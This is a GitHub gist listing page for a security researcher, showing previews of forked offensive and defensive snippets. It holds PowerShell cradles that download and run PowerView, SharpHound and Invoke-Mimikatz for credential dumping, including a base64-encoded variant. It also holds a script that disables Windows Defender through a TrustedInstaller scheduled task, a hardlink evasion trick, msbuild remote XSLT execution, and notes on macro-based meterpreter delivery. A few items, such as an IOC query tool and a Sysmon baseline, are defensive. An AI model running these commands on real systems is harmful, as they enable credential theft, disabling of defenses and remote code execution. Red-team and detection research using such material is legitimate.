Skip to content

Instantly share code, notes, and snippets.

View MHaggis's full-sized avatar
:shipit:

Michael Haag MHaggis

:shipit:
358 followers · 86 following
View GitHub Profile
@MHaggis
MHaggis / iocs_to_definition.py
Created February 26, 2019 16:56 — forked from keithmccammon/iocs_to_definition.py
Make a Surveyor definition given a file full of indicators, one per line. Warning: This is a hack and performs no grouping. It's just a really fast means of asking Cb Response "where do these things appear?"
#!/usr/bin/env python
"""
To use me:
1) Make a file full of indicators, one per line, call it indicators.txt.
NOTE: This was written to handle IP addresses. Change line 40 from ipaddr to md5 if passing hashes.
2) python iocs_to_definition.py indicators.txt
@MHaggis
MHaggis / RedTeam_CheatSheet.ps1
Created November 25, 2019 16:06 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@MHaggis
MHaggis / TestAssembly.cs
Created December 5, 2019 17:36
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace
@MHaggis
MHaggis / Update_Notes.md
Created January 28, 2020 15:46
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@MHaggis
MHaggis / Find-Assemblies.ps1
Created February 14, 2020 04:51 — forked from TheWover/Find-Assemblies.ps1
Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.
Param([parameter(Mandatory=$true,
HelpMessage="Directory to search for .NET Assemblies in.")]
$Directory,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to search recursively.")]
[switch]$Recurse = $false,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to include DLLs in the search.")]
[switch]$DLLs = $false,
[parameter(Mandatory=$false,
@MHaggis
MHaggis / xslt.proj
Created February 14, 2020 04:55 — forked from TheWover/xslt.proj
msbuild XSLT Execute From URL. Courtesy of an ephemeral Casey Smith tweet
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
<Target Name="Example">
<ItemGroup>
<XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" />
</ItemGroup>
<PropertyGroup>
<XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile>
</PropertyGroup>
<XslTransformation
OutputPaths="output.%(XmlFiles.FileName).html"
@MHaggis
MHaggis / Various-Macro-Based-RCEs.md
Created April 29, 2020 20:29 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
@MHaggis
MHaggis / doh.ps1
Created July 27, 2020 13:47 — forked from tyranid/doh.ps1
Something or other.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
@MHaggis
MHaggis / Quick-Mimikatz
Created March 8, 2021 02:21 — forked from gfoss/Quick-Mimikatz
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQ
@MHaggis
MHaggis / log_nothing.xml
Created April 20, 2021 13:54 — forked from mgraeber-rc/log_nothing.xml
A sysmon configuration that defaults to logging nothing. I use this as a baseline configuration for testing purposes where I can selectively turn on log sources by changing "include" to "exclude"
<Sysmon schemaversion="4.50">
<HashAlgorithms>md5,sha256</HashAlgorithms>
<EventFiltering>
<!--Event ID 1: Process creation-->
<ProcessCreate onmatch="include"></ProcessCreate>
<!--Event ID 2: A process changed a file creation time-->
<FileCreateTime onmatch="include"></FileCreateTime>
<!--Event ID 3: Network connection-->
<NetworkConnect onmatch="include"></NetworkConnect>
<!--Event ID 5: Process terminated-->